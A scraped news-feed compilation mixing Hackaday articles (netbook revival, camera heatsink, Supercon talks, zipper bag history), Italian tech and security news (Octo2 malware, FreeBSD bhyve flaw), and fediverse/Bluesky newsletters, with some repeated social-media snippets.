Welcome back to 2010 and the Asus eeePC Netbook, Seashell series. (Credit: Igor Ljubuncic) It’s often said these days that computers don’t become outdated nearly as quickly as they did in the past, with even a decade-old computer still more than capable of handling daily tasks for the average person. Testing that theory, [Igor Ljubuncic] revisited the Asus eeePC which he purchased back in 2010. Although it’s not specified exactly which model it is, it features an Intel Atom N450 (1 core, 2 threads) running at 1.67 GHz, 1 GB of 667 MHz DDR2 and a 250 GB HDD, all falling into that ultra-portable, 10.1″ Netbook category.
When new, the netbook came with Windows 7 Starter Edition, which [Igor] replaced with Ubuntu Netbook Remix 10.04, which was its own adventure, but the netbook worked well and got dragged around the world on work and leisure assignments. With increasingly bloated updates, Ubuntu got replaced by MX Linux 18, which improved matters, but with the little CPU struggling more and more, [Igor] retired the netbook in 2019. That is, until reviving it recently.
Upon booting, the CMOS battery was of course empty, but the system happily continued booting into MX Linux. The Debian update repositories were of course gone, but changing these to the archive version allowed for some (very old) updates. This raised the question of whether modern Linux would even run on this ancient Atom CPU, the answer of which turned out to be a resounding ‘yes’, as MX Linux still offers 32-bit builds of its most recent releases. A 15 minute upgrade process later, and a 2 minute boot later, the system was running a Linux 6.1 kernel with Xfce desktop.
As for the performance, it’s rather what you expect, with video playback topping out at 480p (on the 1024×600 display) and applications like Firefox lacking the compact density mode, wasting a lot of screen space. Amazingly the original battery seems to still deliver about half the runtime it did when new. All of which is to say that yes, even a ‘low-end’ 2010-era netbook can still be a very usable system in 2024, with a modern OS.
Tidelift, azienda specializzata nel supporto e nella manutenzione di software open source, ha pubblicato il rapporto “2024 State of the Open Source Mantainer” . Lo studio si basa su un sondaggio condotto su 437 manutentori di progetti Open Source e rivela una serie di problemi e tendenze in quest’area.
Secondo il rapporto, il 12% degli intervistati riceve la maggior parte del proprio reddito da progetti Open Source. Gli sviluppatori che svolgono attività di manutentore come hobby non retribuito è pai al 60%, di cui il 44% vorrebbe ricevere un compenso monetario per il proprio contributo. Rispetto allo scorso anno la distribuzione delle risposte è rimasta pressoché invariata.
I manutentori pagati per il loro lavoro dedicano molto più tempo allo sviluppo dei progetti. Tra i manutentori “professionali” retribuiti, l’82% dedica più di 20 ore settimanali allo sviluppo. Tra i “dilettanti” solo l’8% degli intervistati può permettersi un carico di lavoro così temporaneo.
I manutentori “professionisti” hanno notato che i finanziamenti hanno permesso loro di lavorare su richieste di nuove funzionalità (64%), investigare e correggere bug e problemi di sicurezza (52%) e reclutare altri manutentori (26%).
Negli ultimi tre anni si è verificato un cambiamento significativo nella distribuzione del tempo dedicato alle questioni di sicurezza. Se nel 2021 trascorrevano il 4% del tempo, ora questa cifra ha raggiunto l’11%. Allo stesso tempo, i manutentori retribuiti dedicano il 13% del loro tempo alla sicurezza rispetto al 10% dei colleghi non retribuiti.
Dallo studio è emerso che il 60% dei manutentori ha pensato di abbandonare il progetto e il 22% lo ha già fatto. Tra i principali motivi di insoddisfazione per il proprio ruolo nel progetto, gli intervistati hanno citato: pagamento insufficiente o mancato (50%), sentirsi sottovalutati (48%), stress aggiuntivo (43%) e aspettative gonfiate degli utenti (39%).
Il rapporto dimostra anche il cambiamento della struttura per età della comunità dei manutentori. Negli ultimi tre anni, la percentuale di sviluppatori di età compresa tra 46 e 55 anni o tra 56 e 65 anni è raddoppiata. Allo stesso tempo, la percentuale dei manutentori sotto i 26 anni è scesa dal 25% nel 2021 al 10% quest’anno.
È interessante notare che il 45% degli intervistati sono manutentori Open Source da più di 10 anni.
This week Jonathan Bennett and and Randal Schwartz chat with Michael and Benedikt about Emba, the embedded firmware analyzer that finds CVEs and includes the kitchen sink! It does virtualization, binary analysis include version detection, and more. Check it out!
Did you know you can watch the live recording of the show Right on our YouTube Channel? Have someone you’d like us to interview? Let us know, or contact the guest and have them contact us! Take a look at the schedule here.
It’s been an eventful week in the fediverse, with the Swiss government ending their Mastodon pilot, the launch of the Social Web Foundation, Interaction Policies with GoToSocial and more!
Swiss Government’s Mastodon instance will shut down
The Swiss Government will shut down their Mastodon server at the end of the month. The Mastodon server was launched in September 2023, as a pilot that lasted one year. During the original announcement last year, the Swiss government focused on Mastodon’s benefits regarding data protection and autonomy. Now that the pilot has run for the year, the government has decided not to continue. The main reason they give is the low engagement, stating that the 6 government accounts had around 3500 followers combined, and that the contributions also had low engagement rates. The government also notes that the falling number of active Mastodon users worldwide as a contributing factor. When the Mastodon pilot launched in September 2023, Mastodon had around 1.7M monthly active users, a number that has dropped a year later to around 1.1M.
The Social Web Foundation has launched
The Social Web Foundation (SWF) is a new foundation managed by Evan Prodromou, with the goal of growing the fediverse into a healthy, financially viable and multi-polar place. The foundation launches with the support of quite a few organisations. Some are fediverse-native organisations such as Mastodon, but Meta, Automattic and Medium are also part of the organisations that support the SWF. The Ford Foundation also supports the SWF with a large grant, and in total the organisation has close to 1 million USD in funding.
The SWF lists four projects that they’ll be working on for now:
adding end-to-end encryption to ActivityPub, a project that Evan Prodromou and Tom Coates (another member of the SWF) recently got a grant for.
Creating and maintaining a fediverse starter page. There are quite a variety of fediverse starter pages around already, but not all well maintained.
A Technical analysis and report on compatibility between ActivityPub and GDPR.
Working on long-form text in the fediverse.
The SWF is explicit in how they define two terms that have had a long and varied history: they state that the ‘fediverse’ is equivalent with the ‘Social Web’, and that the fediverse only consists of platforms that use ActivityPub. Both of these statements are controversial, to put it mildly, and I recommend this article for an extensive overview of the variety of ways that the term ‘fediverse’ is used by different groups of people, all with different ideas of what this network actually is, and what is a part of it. The explicit exclusion and rejection of Bluesky and the AT Protocol as not the correct protocol is especially noteworthy.
Another part of the SWF’s announcement that stands out is the inclusion of Meta as one of the supporting organisations. Meta’s arrival in the fediverse with Threads has been highly controversial since it was announced over a year ago, and one of the continuing worries that many people express is that of an ‘Extend-Embrace-Extinguish’ strategy by Meta. As the SWF will become a W3C member, and will likely continue to be active in the W3C groups, Meta being a supporter of the SWF will likely not diminish these worries.
As the SWF is an organisation with a goal of evangelising and growing the fediverse, it is worth pointing out that the reaction from a significant group within the fediverse developer community is decidedly mixed, with the presence of Meta, and arguments about the exclusive claim on the terms Social Web and fediverse being the main reasons. And as the goal of the SWF is to evangelise and grow the fediverse, can it afford to lose potential growth that comes from the support and outreach of the current fediverse developers?
Software updates
There are quite some interesting fediverse software updates this week that are worth pointing out:
GoToSocial’s v0.17 release brings the software to a beta state, with a large number of new features added. The main standout feature is Interaction Policies, with GoToSocial explaining: “Interaction policies let you determine who can reply to, like, or boost your statuses. You can accept or reject interactions as you wish; accepted replies will be added to your replies collection, and unwanted replies will be dropped.”
Interaction Policies are a highly important safety feature, especially the ability to turn off replies, as game engine Godot found out this week. It is a part where Mastodon lags behind other projects, on the basis that it is very difficult in ActivityPub to fully prevent the ability for other people to reply to a post. GoToSocial takes a more practical route by telling other software what their interaction policy is for that specific post, and if a reply does not meet the policy, it is simply dropped.
Peertube 6.3 release brings the ability to separate video streams from audio streams. This allows people now to use PeerTube as an audio streaming platform as well as a video streaming platform.
The latest update for NodeBB signals that the ActivityPub integration for the forum software is now ready for beta testing.
Ghost’s latest update now has fully working bi-directional federation, and they state that a private beta is now weeks away.
In Other News
IFTAS has started with a staged rollout of their Content Classification Service. With the opt-in service, a server can let IFTAS check all incoming image hashes for CSAM, with IFTAS handling the required (for US-based servers) reporting to NCMEC. IFTAS reports that over 50 servers already have signed up to participate with the service. CSAM remains a significant problem on decentralised social networks, something that is difficult to deal with for (volunteer) admins. IFTAS’ service makes this significantly easier while helping admins to execute their legal responsibilities. Emelia Smith also demoed the CCS during last week’s FediForum.
The Links
All the speed demo videos of last week’s FediForum are now available on PeerTube.
Welcome to this week’s update, with lots of news regarding T&S on Bluesky, managed PDS hosting, and a deeper dive into the Jetstream!
The News
Bluesky released an update on their current efforts on Trust and Safety, listing all the features the team is currently working on. There are quite a few features being worked on that are great (better ban evasion detection, moderation feedback via app), and I want to highlight two of them:
Geography-specific labels. Bluesky is working to add the ability to remove posts only in certain countries, if they violate local laws but are allowed by Bluesky’s own guidelines. This is a feature that I’ll certainly be writing more about once more about it becomes known, as it poses tons of interesting questions about decentralised protocols and national internet sovereignty. As Bluesky’s own labels can be avoided in an open protocol by running your own infrastructure, it poses the questions of whether people actually do this to circumvent local laws, as well as the extend local governments will accept this (or understand it, to be honest).
With toxicity detection experiments, Bluesky aims to detect rude replies and potentially reduce their visibility, possibly by hiding them behind a ‘show more comments’ button. It puts Bluesky closer to what other networks are doing, which is hiding bad or spammy comments behind a button you have to click to see. My guess is that Bluesky also eventually will end up in this position, skipping the labeling part altogether.
A report by Brazilian investigative researchers finds that Bluesky is having difficulty moderation CSAM in Portugese, mapping 125 accounts that sell or share CSAM. Bluesky’s head of Trust & Safety already reported in early September that the sudden inflow of new users lead to a 10x increase in reported CSAM, as well as a more general strain on the moderation. Bluesky’s Emily Liu also stated in response to the report: “we’re taking this extremely seriously, and since the recent influx of users started, we’ve hired more human moderators (who are also provided mental health services) + implementing additional tooling that can quash these networks faster and more effectively”.
Bluesky has appointed a legal representative in Brazil, and will make an official announcement in the next few days. X not having a legal representative in Brazil is what ultimately led to a ban on X in Brazil. This week, X finally caved and appointed a representative, and X might become unbanned in the next few days again. It is worth watching how X becoming available again in Brazil will impact the current userbase of Brazilians on Bluesky. While some will undoubtedly go back to using X, the open question is how large this group will be.
In other news
With a maturity of the ecosystem, companies are starting to offer managed hosting of a PDS, both in the US as well as in Japan. It also raises interesting question regarding branding and marketing: both of these services explicitly advertise themselves as offering a Bluesky PDS: while that makes sense from the company’s perspective (very few people will understand what an atproto PDS is), I am entirely unclear if this desirable from the perspective of the Bluesky company.
Brazilian tech YouTuber Gabs Ferreira interviewed Bluesky engineer hailey about developing on Bluesky, focusing specifically on mobile and React Native (in English). Ferreira interviewed Bluesky CTO Paul Frazee last week, and will talk with Dan Abramov on 26-09.
Altmetric, which tracks engagement with academic research, is working on adding support for Bluesky.
EmbedSky is a new tool to ’embed the last thirty posts and reposts from your BlueSky timeline in your blog or website’. It works with OAuth, which facilitates that the tool can only be used to embed posts from your own account.
On Relays, Jetstreams and costs
Some semi-technical protocol discussion about relays is worth mentioning, since I see people on the other networks talk about it. First, a super simplified description of how atproto works: everyone’s data is stored in a simple database, which does not much else besides storing your data, called a PDS. A Relay scrapes all the PDS’s on the entire network, and turns it into an unending stream of updates, often colloquially called a firehose. An AppView takes all the data from the firehose and makes it presentable for a user (counting all the ‘likes’ on a post, for example).
People on other networks often assume that running a Relay is prohibitively expensive, and it turns out it is not: Bluesky engineer Bryan Newbold ran an extra full-network Relay for 150 USD/month, and recently someone confirmed this is still possible after the massive influx of new users.
Relays can be ‘expensive’ in another way though: a lot of the data that goes through a Relay is dedicated to making sure that the data is authenticated. This is the ‘Authenticated’ part in the name ‘Authenticated Transfer Protocol’. However, there are quite some use cases for which it is not necessary to validate every single event that comes through the firehose, such as a simple bot that listens for certain keywords. In that case, they can get by with a simpler version of the firehose.
Two versions of such a simpler version, called a Jetstream, launched this week. Bluesky engineer Jaz released their own version of a Jetstream, accompanying with an extensive blog post in which they describe how it works. They note that this reduces traffic activity by 99%, all while running on a 5$/month VPS. Jaz also says that an official Bluesky version of a Jetstream is coming soon.
Skyware (who recently released a lightweight labeler as well) also has their own version of a Jetstream available as well.
Frontpage, a HackerNews-like build on top of atproto, now has OAuth login.
That’s all for this week, thanks for reading! You can subscribe to my newsletter to receive the weekly updates directly in your inbox below, and follow me on Bluesky @laurenshof.online.
It’s honestly amazing the range of fascinating talks we have lined up for this year’s Supercon. From art robots that burp and belch to gliders returning from near-space, from hardcore DSP to DIY PCBs, and sketching with machines, Hackaday’s Supercon is like nothing else out there.
And in case you’re already coming, you don’t have a talk slot reserved, but you’ve still got something that you want to say, please sign yourself up for a Lightning Talk! In the spirit of the Lightning, we’ll be taking submissions up to the absolute last minute, and we will fit in as many short talks as possible, but when it does fill up, we’ll be giving priority to those who got in first.
We’ve got one more speaker announce coming up, and of course our keynote speaker and the badge reveal. Supercon will sell out so get your tickets now before it’s too late. So without further ado, here is our next round of stellar speakers!
Katherine Connell Sprite Lights: LED Body Art
Sprite Lights are 1.5 mm thick LED body art, think a light up temporary tattoo. Join Katherine “Smalls” Connell to hear about the 6-year journey to create the impossible as a self taught maker. From hundreds of rapid prototypes, and smelting metal in her driveway to reflowing home made flexible circuits on a griddle, Sprite Lights is a testament that when you’re willing to try anything, you can create everything.
James Rowley Using an Oscilloscope to Peek Below the Noise Floor
In this talk, we will explore the DSP magic that allows lock-in amplifiers to detect signals hidden below the noise floor. By making a change to the measurement setup, these devices can isolate and measure faint signals amidst noise a hundred dB higher. Lock-in amplifiers are used in various applications, from sensitive photonics research to next-generation battery research and quantum computing. We’ll also show you how to use your oscilloscope as a lock-in amplifier, enabling a low-cost entry point to these niche instruments.
Nanik Adnani A Hacker’s Guide to Analog Design in a Digital World
When someone says analog design – what do you think of? If I had to guess I would say you don’t associate it with modern technology. And yet – analog circuits and the designers that build them play a critical role in every modern electronic device, especially the digital ones. In this talk I will provide an overview of the incredible analog circuits in our pockets, and often already in our projects. Once you’re convinced – I’ll show that analog design isn’t as hard as you think and how a few simple concepts can significantly improve your next project, while providing examples with some of mine.
Justin McAllister and Nick Foster Finding Beamo – from interference to numbers stations, how to track down radio transmissions
In a world increasingly reliant on wireless communication, the ability to track down and understand the sources of radio transmissions has never been more critical. From identifying interference in urban environments to the enigmatic world of numbers stations, “Finding Beamo” will take the audience on a journey through the fascinating and often mysterious world of locating radio transmissions.
Randy Glenn Yes, you CAN use the Controller Area Network outside of cars
The Controller Area Network (CAN) is used in cars, trains, buses, planes, and spacecraft – but it’s useful for all sorts of cases where systems need to communicate. I’ll talk about how you can use this technology to transfer data between microcontrollers and larger computers, and will present an example application that you can use as a starting point.
Yohan Hadji Ultralight Glider Returns Home from the Stratosphere
This talk will give you an overview of all the technical challenges to solve to get a sub-250g UAV to autonomously return to home after releasing from a stratospheric balloon at 100,000 ft altitude.
Zach Fredin The Circuit Graver
We all must strive to minimize iteration time. Designing and testing an idea in a single sitting spawns great things! It’s why we visit fab labs and love laser cutters and push the 3D printers in the corners of our apartments to the absolute limit. But circuit tools haven’t kept up; once you’re done mashing together breakout boards, your choices of milling, conductive-pasting, or home etching all leave a bit to be desired; they’re often messy, delicate, and lack the precision to reach the funnest parts in the catalog. Ugh, I need to go smaller than SOICs, and I don’t want to wait a week for commercial boards!
Here, I present and freely share significant progress on a novel method I’ve been poking at over the last few years which demonstrates the feasibility of fabricating 4/4 PCBs at home!
Priyanka Makin Tech to Hack Embodiment
Tech constantly takes us out of the present moment and beckons us into the internet wormhole, but can we use technology to explore our emotions and root us in the now or even our physical bodies? At supercon, I would love to talk about my Body of Work series and how I used technology to interrogate my own embodiment.
My Body of Work is a series of tech-powered body part sculptures that relate to my own relationship with my body and come together to make an unconventional self-portrait. I’d like to start my talk with a bit of my research on the origins of artificial life, what embodiment is, and why acknowledging our bodies is important.
Blair Subbaraman Sketching with Machines
Artists, craftspeople, and scientists are highly skilled makers. Yet, software for making physical things often overlooks existing skill sets, forcing practitioners to work against built-in assumptions to accomplish their goals. Using examples from digital art, ceramics, and plant biology, this talk will consider how creative practices can guide the development of digital fabrication systems and communities.
Eduardo Contreras “Cats Turned Plumbers: Embedded Linux Adventures”
A bit of our journey deploying embedded Linux systems, and integrating drivers on the Linux kernels, from the hardware, to the kernel.
[If you read this far, you probably want tickets. Just sayin’.]
@Informatica (Italy e non Italy 😁) L’indagine Ipsos sul fenomeno deepfake, tra consapevolezza e preoccupazione Il 46% degli italiani crede che l’intelligenza artificiale aumenti di molto il rischio di disinformazione, secondo una nuova indagine Ipsos dal titolo “Deepfake: consapevolezza e
Every action camera these days seems prone to overheating and sudden shutdowns after mere minutes of continuous operation. It can be a real pain, especially when the only heat problem a photographer might face back in the day was fogged film from storing a camera in a hot car. Then again, the things a digital camera can do while it’s not overheated are pretty amazing compared to analog cameras. Win some, lose some, right?
Maybe not. [Zachary Tong], having recently acquired an Insta360 digital camera, went to extremes to solve its overheating problem with this slick external heat sink project. The camera sports two image sensor assemblies back-to-back with fisheye lenses, allowing it to capture 360° images, but at the cost of rapidly overheating. [Zach]’s teardown revealed a pretty sophisticated thermal design that at least attempts to deal with the excess heat, including an aluminum heat spreader built into the case, which would be the target of the mod.
He attached a custom copper heatsink to a section of the heat spreader, which had been carefully milled flat to provide the best thermal contact. [Zach] used a fancy boron nitride heat transfer paste and attached the heat sink to the spreader with epoxy. A separate aluminum enclosure was bonded to the copper heat sink, giving [Zach] a place to mount his audio sync and timecode recorder and providing extra thermal mass.
Does it help? It sure seems to; where [Zach] was previously getting about twenty minutes before thermal shutdown with both cameras running, the heatsink-adorned rig was able to run about six times longer, with the battery giving out first. True, the heatsink takes away from the original sleek lines of the camera and might make it tough to use while snowboarding or surfing, but it’s still more portable than some external camera heatsinks we’ve seen. And besides, the copper is pretty gorgeous.
@Informatica (Italy e non Italy 😁) L’indagine Ipsos sul fenomeno deepfake, tra consapevolezza e preoccupazione Il 46% degli italiani crede che l’intelligenza artificiale aumenti di molto il rischio di disinformazione, secondo una nuova indagine Ipsos dal titolo “Deepfake: consapevolezza e
@Informatica (Italy e non Italy 😁) L’indagine Ipsos sul fenomeno deepfake, tra consapevolezza e preoccupazione Il 46% degli italiani crede che l’intelligenza artificiale aumenti di molto il rischio di disinformazione, secondo una nuova indagine Ipsos dal titolo “Deepfake: consapevolezza e
Telegram says it will now provide user data to the police; the walls are closing in on the Snowflake hacker; and why Nintendo's lawsuit against Palworld is bad (and Nintendo will probably win).
Telegram says it will now provide user data to the police; the walls are closing in on the Snowflake hacker; and why Nintendox27;s lawsuit against Palworld is bad (and Nintendo will probably win).#Podcast
Telegram says it will now provide user data to the police; the walls are closing in on the Snowflake hacker; and why Nintendo's lawsuit against Palworld is bad (and Nintendo will probably win).
You probably think of them as “Ziploc” bags, but, technically, the generic term is zipper bag. Everything from electronic components to coffee beans arrive in them. But they weren’t always everywhere, and it took a while for them to find their niche. Image from an early Madsen patent A Dane named Borge Madsen was actually trying to create a new kind of zipper for clothes in the 1950s and had several patents on the technology. The Madsen zipper consisted of two interlocking pieces of plastic and a tab to press them together. Unfortunately, the didn’t work very well for clothing.
A Romanian immigrant named Max Ausnit bought the rights to the patent and formed Flexigrip Inc. He used the zippers on flat vinyl pencil cases and similar items. However, these still had the little plastic tab that operated like a zipper pull. While you occasionally see these in certain applications, they aren’t what you think of when you think of zipper bags.
Zipping
Ausnit’s son, Steven, figured out how to remove the tab. That made the bags more robust, a little handier to use, and it also rendered them less expensive to produce. Even so, cost was a barrier because the way they were made was to heat seal the zipper portion to the bags.
That changed in the 1960s when the Ausnits learned of a Japanese company, Seisan Nippon Sha, that had a process to integrate the bags and zippers in one step which slashed the production cost in half. Flexigrip acquired the rights in the United States and created a new company, Minigrip, to promote this type of bag.
Enter Dow
In 1964, Dow Chemical wanted to acquire the rights to the Minigrip bags to sell in supermarkets using Down’s polyethylene bags. And with this marriage, the Ziploc bag as we know it was born.
Dow continued driving down the cost, tasking R. Douglas Behr to improve how the Ziploc production line worked. Eventually, the bags were flying off the line at 150 feet per minute.
You can find plenty of videos of machines that “make” zipper bags on YouTube (like the one below). Many of them are surprisingly light on detail, and it isn’t clear now how many of them are molding zippers and how many are sealing premade zippers to bags or using rolls of bags with zippers in them already. However, the video below shows making “zip lines” from pellets and then creating bags from film. This creates giant rolls of zipper bag stock which are then cut into individual bags.
At first, consumers weren’t sure what to do with the zipper bags. Supposedly, a record company was set to put records in the bags but when an executive handed one to his assistant, the assistant ripped the bag open without using the zipper.
Regardless, consumers finally figured it out. Now, the zipper bag is a staple in electronics, food storage, and many other areas, too.
More Than Meets the Eye
Even the most ordinary things have details you don’t think about, but someone does. For example, zip bags can have one, two, or three zippers. Some have color indicators that show the seal. Some have strips that conceal the zipper so you can tell if the bag was opened.
There are special zippers for liquids and different ones that resist getting powder stuck in the seal. Some zip bags still have pulls, and some of those pulls are child-proof, requiring the user to pinch the tab to slide it. You can even get zipper bags that don’t use locking zippers but hook-and-loop closures.
Even though zipper bags don’t seem very glamorous, you can learn a lot from the Ausnits. Improve your product in ways that make people want to use it. Also, improve your product in ways that lower costs. We’d guess that when Ausnit bought the zipper patents, he’d never imagine how the market would grow.
You can see a talk from Steve Ausnit at Marquette University in the video below. If you’ve ever had the urge to be an entrepreneur, you can learn a lot from his talk.
In Europa si sta diffondendo una nuova variante del malware Android chiamata Octo2, che è una versione migliorata di Octo (ExobotCompact). Secondo gli esperti di ThreatFabric, la nuova versione potrebbe avere un impatto significativo sul panorama della sicurezza informatica.
Octo2 è un aggiornamento di un malware popolare tra i criminali informatici, distribuito secondo il modello Malware-as-a-Service (MaaS). Questa versione presenta funzionalità migliorate per il controllo remoto dei dispositivi delle vittime e l’uso di nuovi metodi di camuffamento, inclusa la generazione di nomi di dominio (DGA), che consente di aggirare i meccanismi di sicurezza e non essere rilevati.
La famiglia Exobot è stata notata per la prima volta nel 2016 come trojan bancario in grado di eseguire attacchi di overlay di interfaccia e intercettare chiamate e messaggi. Nel 2019 è apparsa una versione leggera di ExobotCompact e già nel 2021 la sua variante migliorata chiamata Octo. È stata questa versione a diventare la base per ulteriori modifiche.
Nel 2022, i criminali informatici hanno discusso attivamente di Octo nei forum clandestini. Da allora l’attività del malware non ha fatto altro che aumentare e presto ha cominciato ad essere utilizzato in diverse regioni del mondo, tra cui Europa, Stati Uniti e Asia.
Il cambiamento principale nel 2024 è dovuto alla fuga del codice sorgente di Octo, che ha portato a diversi fork del programma. Tuttavia, la minaccia più grande è l’originale Octo2, sviluppato dal creatore di Octo e distribuito a coloro che in precedenza utilizzavano la prima versione.
Octo2 ha ricevuto aggiornamenti significativi, inclusi miglioramenti alla stabilità della gestione remota dei dispositivi e metodi per aggirare i sistemi di rilevamento e analisi. Octo2 dispone anche di un sistema che permette di intercettare le notifiche push provenienti dai dispositivi delle vittime e di nasconderle, privando così gli utenti di avvisi importanti. Ciò rappresenta una minaccia per molte applicazioni mobili poiché gli aggressori possono facilmente reindirizzare i dati ed eseguire attività fraudolente.
Le prime campagne con Octo2 sono già state registrate in paesi come Italia, Polonia, Moldavia e Ungheria. Il malware si maschera da applicazioni popolari come Google Chrome e NordVPN, permettendogli di intrufolarsi nei dispositivi degli utenti senza essere notato.
Nelle campagne rilevate, il servizio Zombinder funge da prima fase di installazione: dopo il lancio, Zombinder richiede l’installazione di un “plugin” aggiuntivo, che in realtà è Octo2, aggirando così con successo le restrizioni di Android 13+. Zombinder richiede l’autorizzazione per installare un “plug-in richiesto” sotto forma di trojan Octo2
Uno degli elementi chiave di Octo2 è stata l’integrazione di un nuovo metodo di generazione dei nomi di dominio (Domain Generation Algorithm, DGA), che consente al malware di cambiare dinamicamente i server di controllo (C2). Ciò rende difficile per i ricercatori e le aziende antivirus poiché i nuovi domini vengono creati automaticamente, rendendoli più difficili da bloccare.
Inoltre, Octo2 utilizza un nuovo sistema di crittografia dei dati trasmessi ai server di controllo, con una chiave dinamica per ogni richiesta, che migliora la protezione dall’analisi e dal rilevamento.
Considerando il suo migliore accesso remoto e le sue capacità invisibili, Octo2 rappresenta una seria minaccia per gli utenti mobili, in particolare quelli che utilizzano applicazioni bancarie. Il programma è in grado di eseguire silenziosamente operazioni fraudolente direttamente sul dispositivo della vittima, il che rende il malware uno dei trojan mobili più pericolosi.
[quote]Erano oltre quarant’anni che la Cina non annunciava pubblicamente la conduzione di un test missilistico, da quando, nel 1980, lanciò con successo il suo primo missile intercontinentale, il DF-5, che percorse oltre 8mila chilometri prima di precipitare
Orpheus Network tells users: "With great displeasure we need to inform you that a malicious actor has successfully carried out a massive peer scraping attack on our tracker."#Piracy #Torrenting #Torrents
Google has filed an antitrust complaint accusing Microsoft of unfair licensing practices in cloud computing contracts with the EU Commission on Wednesday (25 September).
È stata definitivamente approvata dalla Camera dei deputati la riforma della condotta e della valutazione alla Primaria.
Qui tutti i dettagli ▶ https://www.miur.gov.
L’Italia è un Paese modello per la sua postura nella cybersicurezza. A dirlo è l’ITU, l’International Telecommunication Union, agenzia delle Nazioni Unite specializzata in ICT, che promuove a pieni voti (100/100) il nostro Paese nel report Global Cybersecurity Index 2024. Con questa pubblicazione, giunta alla quinta edizione, l’agenzia ONU valuta il livello di maturità della cybersicurezza di oltre 190 Paesi, prendendo come parametro 5 aspetti: legale, tecnico, organizzativo, sviluppo delle capacità e cooperazione. L’ITU suddivide i Paesi in gruppi: dai più virtuosi (Tier 1) a quelli in via di costruzione (Tier 5). Il primo gruppo, a cui si accede con un voto minimo di 95/100, è composto dai 46 Paesi che hanno dimostrato un forte impegno nel settore, coordinando le attività del governo con quelle dei privati e dimostrando solidità in tutti e cinque i parametri.
L’Italia è stata quindi promossa per la normativa nazionale sulla cybersicurezza e sul cybercrime, le sue capacità tecniche come la presenza di un CSIRT nazionale, l’adozione di una strategia nazionale e la presenza di un’agenzia governativa specializzata (l’ACN appunto), gli incentivi per lo sviluppo, il miglioramento delle competenze e della consapevolezza. E, infine, per la collaborazione a livello internazionale e con i privati.
Per la rilevazione, ogni Paese ha compilato un questionario tramite il punto di contatto, che per l’Italia è l’Agenzia per la cybersicurezza nazionale. I dati così raccolti sono stati arricchiti e verificati da fonti indipendenti. Il report 2024 è stato realizzato analizzando 30mila url e più di mille pdf, fa sapere l’ITU.
Nonostante il miglioramento globale nella postura di cybersicurezza, l’ITU invita a non abbassare la guardia. Tra le minacce persistenti segnala: i ransomware, gli attacchi informatici – che toccano industrie chiave causando anche interruzioni di servizi – e le violazioni della privacy che riguardano individui e organizzazioni.
È stata presentata oggi, in conferenza stampa, la nazionale italiana dei cyberdefender. TeamItaly, questo il nome, parteciperà alla European Cybersecurity Challenge di Torino dal 7 all’ 11 ottobre presso le Grandi Officine Riparazioni.
L’evento, organizzato da Acn e dal Laboratorio nazionale di cybersecurity del Cini vedrà la partecipazione di 38 squadre e due delegazioni ospiti in qualità di osservatori. La ECSC del 2024 è la settima competizione europea che vede competere il Team Italy nelle gare di attacco e difesa e “jeopardy” cioè sfide in parallelo in cui le singole squadre affrontano varie problematiche di sicurezza dalla crittografia alla web Security.
Alla presentazione hanno partecipato il Magnifico Rettore delL’IMT di Lucca, il Prof. Rocco De Nicola, che ha ospitato la conferenza nella sede universitaria; il neo direttore del Laboratorio nazionale di cybersecurity del CINI, professore Alessandro Armando; il vice caposervizio del Servizio Programmi e progetti tecnologici e di ricerca dell’ACN, dottoressa Liviana Lotti; gli allenatori della squadra Mario Polino ed Emilio Coppa.
A disclaimer: Not a single cable tie was harmed in the making of this backpack cyberdeck, and considering that we lost count of the number of USB cables [Bag-Builds] used to connect everything in it, that’s a minor miracle.
The onboard hardware is substantial, starting with a Lattepanda Sigma SBC, a small WiFi travel router, a Samsung SSD, a pair of seven-port USB hubs, and a quartet of Anker USB battery banks. The software defined radio (SDR) gear includes a HackRF One, an Airspy Mini, a USRP B205mini, and a Nooelec NESDR with an active antenna. There are also three USB WiFi adapters, an AX210 WiFi/Bluetooth combo adapter, a uBlox GPS receiver, and a GPS-disciplined oscillator, both with QFH antennas. There’s also a CatSniffer multi-protocol IoT dongle and a Flipper Zero for good measure, and probably a bunch of other stuff we missed. Phew!
As for mounting all this stuff, [Bag-Builds] went the distance with a nicely designed internal frame system. Much of it is 3D printed, but the basic frame and a few rails are made from aluminum. The real hack here, though, is getting the proper USB cables for each connection. The cable lengths are just right so that nothing needs to get bundled up and cable-tied. The correct selection of adapters is a thing of beauty, too, with very little interference between the cables despite some pretty tightly packed gear.
What exactly you’d do with this cyberpack, other than stay the hell away from airports, police stations, and government buildings, isn’t exactly clear. But it sure seems like you’ve got plenty of options. And yes, we’re aware that this is a commercial product for which no build files are provided, but if you’re sufficiently inspired, we’re sure you could roll your own.
io non sono pacifista, perlomeno non nel modo ottuso comunemente inteso, teso solo a liberarsi dai problemi altrui, ma la radice della guerra è la sub-cultura della violenza, dell'intolleranza, dell'allergia al diverso, dell'ingiustizia, del bullismo. pace non è assenza di guerra, ma giustizia. e israele farebbe bene a smettere di comportarsi come gli americani con i pellerossa. e putin farebbe bene almeno a cercare di smettere di voler assurdamente apparire come i liberatori del mondo dal dominio usa. raramente chi fa parte della sfera di influenza russa è libero e felice.
Di recente, il canale Telegram di SecActor ha rivelato una notizia di notevole importanza per la sicurezza informatica: una vulnerabilità critica di esecuzione di codice da remoto (RCE) che affligge il sistema operativo FreeBSD. Questa vulnerabilità, CVE-2024-41721, scoperta dal team di sicurezza di Synacktiv, riguarda il suo hypervisor bhyve e rappresenta una seria minaccia per la sicurezza delle macchine virtuali che operano su questo sistema.
Origine del problema e impatto sulla sicurezza
La vulnerabilità ha origine nell’emulazione del controller XHCI (eXtensible Host Controller Interface) del componente bhyve, il cui scopo è emulare l’hardware USB all’interno delle macchine virtuali. Il problema risiede nella mancata verifica dei limiti di memoria, che permette al codice di leggere al di fuori dell’area designata, causando potenzialmente un crash del processo hypervisor o, peggio, l’esecuzione di codice arbitrario sulla macchina host.
Questa vulnerabilità è particolarmente pericolosa perché consente a un eventuale malware, eseguito su una macchina virtuale ospite, di acquisire il controllo dell’intero sistema fisico. In questo contesto, il fatto che il processo bhyve sia eseguito con privilegi elevati (root) non fa che amplificare le conseguenze di un attacco riuscito.
Nonostante bhyve utilizzi una tecnologia di sandboxing (Capsicum) per ridurre le capacità dei processi e isolarli, il rischio di sfruttamento rimane presente, soprattutto nelle configurazioni che emulano dispositivi USB.
Tutti i sistemi FreeBSD che utilizzano l’emulazione XHCI sono vulnerabili e, al momento della pubblicazione del bollettino, non esiste un workaround alternativo. L’unica soluzione per mitigare il rischio consiste nell’applicazione delle patch rilasciate il 19 settembre 2024, che correggono questa vulnerabilità.
